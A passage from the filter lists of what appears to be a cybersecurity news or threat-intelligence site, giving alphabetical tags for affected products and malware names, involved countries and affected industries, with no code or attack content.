Orbit Schneider Electric Product ScopeCreep ScreenConnect ScreenConnect (versions 25.2.3 and earlier) Scrolling Screenshot Tool & Screen Capture SearchFilter.exe SellerSprite - Amazon Research Tool semantic-types (PyPI) SEMRush Rank SEMRush Rank (ID: idbhoeaiokcojcgappfigpifhpkjgmab) SentinelOne Singularity Endpoint protection service ShadowPad Silicon Labs Gecko Bootloader on ARM (Firmware Update File Parser modules) SimpleHelp SimpleHelp RMM platform SimpleHelp RMM Software SMA Sunny Webbox Small Business Administration’s Economic Injury Disaster Loan program Smokeloader SMS SMS-based two-factor authentication (2FA) Snapchat Snowflake Snowflake cloud platform solana-live (PyPI) Solana-themed packages (PyPI) Solare Datensysteme SolarLogs SolarWinds SolarWinds DameWare Mini Remote Control Service SolarWinds Serv-U SolarWinds Web Help Desk SonicWall SonicWall SMA SonicWall SMA 100 SonicWall SMA100 SonicWall SonicOS Sophos XG firewall devices Speed Dial [FVD] - New Tab Page, 3D, Sync Srimax Output Messenger SSH SSH (Linux) SSH services sshd SSHdInjector Stark Industries Solutions Inc. StealC Steam Stuxnet Substations (Ukraine Grid) sudo utility Sungrow WiNet and Logger1000 devices Susie Wiles' Personal Cellphone svchost.exe SyncBackFree system-health-sync-api SystemBC systemd-coredump T-Life app (Android and Apple versions) Tata Consultancy Services (TCS) taya TBK DVR devices TBK DVR-4104 and DVR-4216 TBK DVR-4104 and DVR-4216 digital video recording devices TBK DVRs TCM ADD TeamViewer Teapot Stealer telecommunications networks Telecommunications networks Telecommunications Systems Telegram TeleMessage TM SGNL Tenable Network Monitor Tenable One TerraStealer v2 The North Face The North Face Customer Accounts on thenorthface.com thenorthface.com ThinManager TikTok TikTok Internal APIs TP-Link TP-Link Archer AX21 TravelArrow – Your Virtual Travel Agent Triada modular backdoor Trickbot TrickBot Trojan-Banker.AndroidOS.Bankurt.c Trojan-Banker.AndroidOS.Mamont Trojan-Downloader.AndroidOS.Dwphon.a Trojan.AndroidOS.Triada.fe Trojan.AndroidOS.Triada.ga Trojan.AndroidOS.Triada.gn Trojan.AndroidOS.Triada.gs Trojan.AndroidOS.Triada.hf TrueOnline ZyXEL P660HN-T v1 router Trust Wallet Tupolev Servers Tupolev Website Tuya communications module software TV streaming devices, digital projectors, aftermarket vehicle infotainment systems, digital picture frames Ukrainian IP addresses United Natural Foods IT systems Unnamed US telecommunications company Unspecified Classified Workstation Software Unspecified Cloud Providers' IP Address Services Unspecified Communications System Unspecified DIA Internal Systems/Applications Unspecified Libraries Unspecified Remote Access Software Unspecified Remote Access Tools Unspecified USB Drive Formatting/File System US water facilities US-based tax preparation companies' systems Vanta vBulletin vBulletin (versions affected not specified) vBulletin forum software Victoria's Secret corporate systems Victoria's Secret e-commerce website Victoria's Secret Website Vidar Video surveillance devices Virtual Private Networks (VPNs) vkrnlintvsp.sys driver VMware VMware Aria Operations for Networks VMware ESXi VMware vCenter Server Vodafone's hotline Voice Calls Volkswagen App W2V2-AASIST W32.Ramnit Wallet software Watch2Gether Wazuh Wazuh Security Platform Wazuh Server Wealth Management Platforms Web browsers Web Browsers Web Developers' Code Repository (Unspecified) Web Honeypot Web server software (Unspecified) Web Servers Web shells (PHP) Web-facing assets (DNS, web portals, login pages) WebBrowserPassView Webcams running Linux-based operating system WebView WhatsApp Whisper Wiles' personal phone Win32.Worm.Sohanad Wind River VxWorks Wind River VxWorks 7 Windows Windows 10 Windows 11 Windows 11 (22H2 and 23H2) Windows APIs Windows Defender Windows File System Indexer Windows LNK files Windows PowerShell Windows Server Windows Server 2025 Windows Server 2025 dMSA feature Windows servers (including Active Directory) Windows Update (Implied) Windows Update Stack Windows Updates (fake) Windows Workflow Foundation (WF) Winnti WinRAR Wiser AvatarOn 6K Freelocate and Wiser Cuadro H 5P Socket WOLFBOX Level 2 EV Charger WooCommerce WordPress WordPress caching plugin wp-runtime-cache WordPress Depicter Plugin WordPress File Upload plugin WordPress plugin disguised as a security tool WordPress Plugins and Themes Workplace Xbox Live xlsx-to-json-lh xlsx-to-json-lh (npm) XWorm RAT XZ utils xz-utils compression library Yandex Browser Android App Yandex Maps Android App YouTube YouTube API Zerolot Zimbra Collaboration Zimbra Collaboration Suite ZKTeco BioTime Zoom ZTA Microsoft Windows Common Log File System (CLFS) Driver ZTE ZXV10 H108L routers Zyxel Zyxel firewalls Zyxel Firewalls
Involved Countries All Afghanistan Africa Albania Algeria Argentina Asia Australia Austria Azerbaijan Bahamas Bangladesh Belarus Belgium Benin Brazil Bulgaria Burundi California Cambodia Cameroon Canada Chile China Colombia Colorado Costa Rica Cuba Czech Republic Denmark Dominican Republic Ecuador Egypt El Salvador England Estonia Ethiopia EU EU (European Union) Europe European Union Finland Florida France Gabon Germany Great Britain Greece Hong Kong Hungary India Indonesia Iowa Iran Iraq Ireland Israel Italy Japan Jordan Kazakhstan Kyrgyzstan Laos Lebanon Libya Linux Lithuania Madagascar Malaysia Massachusetts Mauritius Mexico Microsoft Middle East Moldova Morocco Myanmar Namibia NATO Nepal Netherlands New York New Zealand Nicaragua Niger Nigeria North America North Korea North Macedonia Oman Pakistan Palestine Panama Peru Philippines Poland Portugal Romania Russia Russian Federation Rwanda Saudi Arabia Senegal Serbia Seychelles Singapore Slovakia Slovenia South Africa South Asia South Asian government South Korea Spain Sri Lanka Sweden Switzerland Syria Taiwan Tajikistan Tanzania Texas Thailand The Netherlands Tunisia Turkey Turkmenistan U.K. U.S. Uganda UK Ukraine United Arab Emirates United Kingdom United States United States of America Unspecified 'friendly foreign government' US USA Uzbekistan Vietnam Wales Yemen
Affected Industries All Adult Entertainment Advertising Advertising and Marketing Aerospace Agriculture Agriculture and Food Production AI Security Aircraft Airlines API (Application Programming Interface) Artificial Intelligence Artificial Intelligence (AI) ASP.NET Software Development Automotive Aviation Banking Biotech Biotechnology Blockchain Technology Building Business Business Services Businesses Certification Authorities (CAs) Chemical Cloud Computing Cloud Infrastructure Cloud Security Cloud Services Coffee Shops Commercial Facilities Compliance Construction and Facilities Management Consulting Consumer Electronics Consumer Services Contact Centers Corporate Corporations Credit Unions Critical Infrastructure Cryptocurrency Cryptocurrency Exchanges Cryptocurrency Investment Cryptocurrency/Finance Customer Support Cybernetics Cybersecurity Data Centers Data Storage Defense Defense and Intelligence Digital Agencies/B2B Sales Digital Certification Services Digital Forensics Digital Identity Digital Platforms Digital Video Recording Digital Video Recording (DVR) Devices Diplomatic Entities Diplomatic Organizations Disability and Health Equipment Diverse Businesses Document Management Domain Name System (DNS) Providers E-commerce E-Commerce Education Education (K-12 Schools) Education (Universities) Elections Electric Vehicle (EV) Charging Electric Vehicle (EV) Charging Infrastructure Electric Vehicle Charging Electric Vehicle Charging Infrastructure Electronics Emergency Services Emergency Services Sector (ESS) Energy Energy and Utilities Energy Production Energy/Utilities Engineering schools Engineering Schools Enterprise Enterprise Browser Security Entertainment Entertainment (Streaming Services) ERP Essential Services Farming Fashion Federal Civilian Executive Branch Federal Civilian Executive Branch (FCEB) Federal Civilian Executive Branch (FCEB) agencies Federal Government Finance Finance/Banking Financial Financial Industry Financial Institutions Financial services Financial Services Financial Services (Broader than just Banking) Financial Services (Cryptocurrency) Financial Services (Cryptocurrency): Financial Services (specifically Cryptocurrency Investment) Financial Services (Specifically Cryptocurrency Investment) Financial Systems Financial Technology Financial Technology (Fintech) Financial Technology (FinTech) Fintech Food and Accommodation Food Distribution Food Distribution/Supply Chain Food Services Food Wholesale Fortune 500 Forums/Online Communities Gaming Gladinet CentreStack/Triofox Users Government Government (Intelligence) Government Facilities Government Organizations Government Services Government Services and Facilities Government/Intelligence Healthcare Healthcare (Hospitals) Healthcare and Public Health High Technology Higher Education Higher Education (Universities) Home Security Hospitality Hosting Hosting Providers Hotel Chains Human Resources Identity Security Individuals/Personal Users Industrial Industrial Automation Industrial Control Systems Industrial Control Systems (ICS) Industrial enterprises Industrial Enterprises Industrial Systems Information sector Information Security Information Technology Information Technology (IT) Instrumentation Insurance Intelligence Internet Infrastructure Internet Infrastructure/Hosting Services Internet of Things (IoT) Internet of Things (IoT) Devices Internet Service Provider (ISP) Internet Service Providers (ISPs) Investment IoT Devices IT IT Companies IT Infrastructure Management IT Management Software IT Operations IT Outsourcing IT Security IT Services IT Services and Logistics IT Support and Managed Services Jewelry Journalism Law Enforcement Law Firms Legal Legal Services Lingerie Local Government Logistics Managed Security Service Providers (MSPs) Managed Service Providers Managed Service Providers (MSPs) Manufacturing Marine Maritime Logistics Mechanical Engineering Media Media and Entertainment Media and Journalism Media Organizations Merchants Microsoft 365 Security Military Military/Defense Mobile Application Development Mobile Device Industry Mobile Device Manufacturing Mobile Device/Smartphone Manufacturing Mobile Security Municipal Government Networking Equipment Manufacturing News Media Non-Governmental Organizations (NGOs) Nonprofit Nuclear Nuclear Energy Office Automation Online Forums Online Gambling Online Retail Operational Technology (OT) Penetration Testing Pharmaceuticals Political Campaigns Political Figures Politics Pornography Industry Pornography/Adult Entertainment Power companies Private Sector Production Professional, scientific and technical services Public Sector Public Transit Publishing Ransomware Remote Monitoring and Management (RMM) Software Research Restaurants Retail Robotics Router Manufacturers Router Manufacturing Scientific Search Engine Security Security/Surveillance Shared Hosting Shipping Small and Medium Businesses (SMBs) Small and Medium-sized Businesses (SMBs) Small Businesses Smart Device Manufacturers Smart Home Industry Social Media Software Software as a Service (SaaS) Software Development Software Industry Software Supply Chain Software-as-a-service (SaaS) Software/AI Tool Development Space Exploration Surveillance Technology Tax Preparation Tax Resolution Services Tech Tech Companies Technology Technology (XR/AR/VR) Technology Manufacturing Telecommunications Third-Party IT Services Ticketing and Entertainment Transport Transportation Transportation/Logistics Travel Travel Agencies Travel and Recreation Travel Industry Universities Vehicle Insurance Video Game Video Game Industry Video Games Virtual Currency Investment Virtualization VPN (Virtual Private Network) VPN and Proxy Services VPN Services Water Water and Wastewater Water and Wastewater Systems Water Systems Water Utilities Web Applications Web Hosting Web Hosting/Internet Infrastructure Web Infrastructure Web Security Web Server Hosting Web3 Website Operators WordPress Plugin Developers/Users